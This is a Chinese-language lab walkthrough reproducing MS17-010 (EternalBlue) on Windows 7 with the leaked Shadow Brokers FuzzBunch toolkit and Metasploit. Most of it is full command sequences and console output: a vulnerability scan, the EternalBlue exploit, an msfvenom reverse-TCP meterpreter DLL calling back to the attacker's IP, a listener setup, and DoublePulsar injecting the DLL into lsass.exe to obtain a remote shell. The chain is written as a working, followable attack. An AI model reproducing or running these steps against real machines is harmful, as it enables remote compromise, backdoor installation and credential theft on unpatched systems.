0x01 准备

这个应该和当年的ms08-067影响一样,现在微软编号MS17-010。
Shadowbroker放出的NSA攻击工具
攻击机:
ip:192.168.153.137
win7 pro 64位,python2.6.6pywin32pentestbox
pentestbox是要用metasploite,也可以用kali。
靶机:
ip:192.168.153.138
win7 pro 64位

0x02 复现

现在metasploite已经可以检测了,在metasploit-framework/modules/auxiliary/scanner/smb目录下,wget https://www.exploit-db.com/download/41891 -O smb_ms_17_010.rb
使用如下

msf > use auxiliary/scanner/smb/smb_ms_17_010
msf auxiliary(smb_ms_17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms_17_010):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      445              yes       The SMB service port
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

msf auxiliary(smb_ms_17_010) > set rhosts 192.168.153.138
rhosts => 192.168.153.138
msf auxiliary(smb_ms_17_010) > run

[*] 192.168.153.138:445   - Connected to \\192.168.153.138\IPC$ with TID = 2048
[*] 192.168.153.138:445   - Received STATUS_INSUFF_SERVER_RESOURCES with FID = 0
[!] 192.168.153.138:445   - Host is likely VULNERABLE to MS17-010!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_ms_17_010) >

存在该漏洞。
安装好环境后,在win 7攻击机器上切换到NSA攻击工具的windows目录,打开终端输入:python fb.py

C:\Users\zero\Documents\shadowbroker-master\windows
λ python fb.py

--[ Version 3.5.1

[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => D:\DSZOPSDISK\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => D:\logs
[*] Autorun ON

ImplantConfig Autorun List
==========================

  0) prompt confirm
  1) execute


Exploit Autorun List
====================

  0) apply
  1) touch all
  2) prompt confirm
  3) execute


Special Autorun List
====================

  0) apply
  1) touch all
  2) prompt confirm
  3) execute


Payload Autorun List
====================

  0) apply
  1) prompt confirm
  2) execute


[+] Set FbStorage => C:\Users\zero\Documents\shadowbroker-master\windows\storage

[*] Retargetting Session

[?] Default Target IP Address [] : 192.168.153.138
[?] Default Callback IP Address [] : 192.168.153.137
[?] Use Redirection [yes] : no

[?] Base Log directory [D:\logs] : smb_logs
[*] Checking C:\Users\zero\Documents\shadowbroker-master\windows\smb_logs for projects
Index     Project
-----     -------
0         Create a New Project

[?] Project [0] :
[?] New Project Name : test
[?] Set target log directory to 'C:\Users\zero\Documents\shadowbroker-master\windows\smb_logs\test\z192.168.153.138'? [Yes] :

[*] Initializing Global State
[+] Set TargetIp => 192.168.153.138
[+] Set CallbackIp => 192.168.153.137

[!] Redirection OFF
[+] Set LogDir => C:\Users\zero\Documents\shadowbroker-master\windows\smb_logs\test\z192.168.153.138
[+] Set Project => test

fb > use eter
Eternalblue     Eternalchampion Eternalromance  Eternalsynergy
fb > use Eternalblue

[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.153.138

[*] Applying Session Parameters
[*] Running Exploit Touches


[!] Enter Prompt Mode :: Eternalblue

Module: Eternalblue
===================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              192.168.153.138
TargetPort            445
VerifyTarget          True
VerifyBackdoor        True
MaxExploitAttempts    3
GroomAllocations      12
Target                WIN72K8R2

[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :

[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.

[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address

[?] TargetIp [192.168.153.138] :

[*]  TargetPort :: Port used by the SMB service for exploit connection

[?] TargetPort [445] :

[*]  VerifyTarget :: Validate the SMB string from target against the target selected before exploitation.

[?] VerifyTarget [True] :

[*]  VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts.

[?] VerifyBackdoor [True] :

[*]  MaxExploitAttempts :: Number of times to attempt the exploit and groom. Disabled for XP/2K3.

[?] MaxExploitAttempts [3] :

[*]  GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do.

[?] GroomAllocations [12] :

[*]  Target :: Operating System, Service Pack, and Architecture of target OS

    0) XP            Windows XP 32-Bit All Service Packs
   *1) WIN72K8R2     Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs

[?] Target [1] :


[!] Preparing to Execute Eternalblue

[*]  Mode :: Delivery mechanism

   *0) DANE     Forward deployment via DARINGNEOPHYTE
    1) FB       Traditional deployment from within FUZZBUNCH

[?] Mode [0] : 1
[+] Run Mode: FB

[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure? (y/n) [Yes] :
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.153.138] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.153.138:445

[+] Configure Plugin Remote Tunnels


Module: Eternalblue
===================

Name                  Value
----                  -----
DaveProxyPort         0
NetworkTimeout        60
TargetIp              192.168.153.138
TargetPort            445
VerifyTarget          True
VerifyBackdoor        True
MaxExploitAttempts    3
GroomAllocations      12
ShellcodeBuffer
Target                WIN72K8R2

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Connecting to target for exploitation.
    [+] Connection established for exploitation.
[*] Pinging backdoor...
    [+] Backdoor returned code: 10 - Success!
    [+] Ping returned Target architecture: x64 (64-bit)
    [+] Backdoor is already installed -- nothing to be done.
[*] CORE sent serialized output blob (2 bytes):
0x00000000  08 01                                            ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded

fb Special (Eternalblue) >

看到succeeded了。接着用msfvenom生成dll。根据靶机的位数生成32或者64位的。

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.153.137 LPORT=8089 -f dll > 64.dll

将dll拷贝到c盘根目录。并且在metasploite中开启handler监听。

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.153.137
lhost => 192.168.153.137
msf exploit(handler) > set lport 8089
lport => 8089
msf exploit(handler) > run

[*] Started reverse TCP handler on 192.168.153.137:8089
[*] Starting the payload handler...

然后紧接着Eternalblue,接着执行use Doublepulsar

fb Special (Eternalblue) > use Doublepulsar

[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.153.138

[*] Applying Session Parameters

[!] Enter Prompt Mode :: Doublepulsar

Module: Doublepulsar
====================

Name              Value
----              -----
NetworkTimeout    60
TargetIp          192.168.153.138
TargetPort        445
OutputFile
Protocol          SMB
Architecture      x86
Function          OutputInstall

[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :

[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds).  Use -1 for no timeout.

[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address

[?] TargetIp [192.168.153.138] :

[*]  TargetPort :: Port used by the Double Pulsar back door

[?] TargetPort [445] :

[*]  Protocol :: Protocol for the backdoor to speak

   *0) SMB     Ring 0 SMB (TCP 445) backdoor
    1) RDP     Ring 0 RDP (TCP 3389) backdoor

[?] Protocol [0] :

[*]  Architecture :: Architecture of the target OS

   *0) x86     x86 32-bits
    1) x64     x64 64-bits

[?] Architecture [0] : 1
[+] Set Architecture => x64

[*]  Function :: Operation for backdoor to perform

   *0) OutputInstall     Only output the install shellcode to a binary file on disk.
    1) Ping              Test for presence of backdoor
    2) RunDLL            Use an APC to inject a DLL into a user mode process.
    3) RunShellcode      Run raw shellcode
    4) Uninstall         Remove's backdoor from system

[?] Function [0] : 2
[+] Set Function => RunDLL

[*]  DllPayload :: DLL to inject into user mode

[?] DllPayload [] :

[*]  DllPayload :: DLL to inject into user mode

[?] DllPayload [] : C:\64.dll
[+] Set DllPayload => C:\64.dll

[*]  DllOrdinal :: The exported ordinal number of the DLL being injected to call

[?] DllOrdinal [1] :

[*]  ProcessName :: Name of process to inject into

[?] ProcessName [lsass.exe] :

[*]  ProcessCommandLine :: Command line of process to inject into

[?] ProcessCommandLine [] :


[!] Preparing to Execute Doublepulsar
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.153.138] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.153.138:445

[+] Configure Plugin Remote Tunnels


Module: Doublepulsar
====================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              192.168.153.138
TargetPort            445
DllPayload            C:\64.dll
DllOrdinal            1
ProcessName           lsass.exe
ProcessCommandLine
Protocol              SMB
Architecture          x64
Function              RunDLL

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
        [+] Backdoor returned code: 10 - Success!
        [+] Ping returned Target architecture: x64 (64-bit) - XOR Key: 0xF79DA652
    SMB Connection string is: Windows 7 Professional 7601 Service Pack 1
    Target OS is: 7 x64
    Target SP is: 1
        [+] Backdoor installed
        [+] DLL built
        [.] Sending shellcode to inject DLL
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Command completed successfully
[+] Doublepulsar Succeeded

fb Payload (Doublepulsar) >

Doublepulsar执行成功,此时msf已经收到了shell了。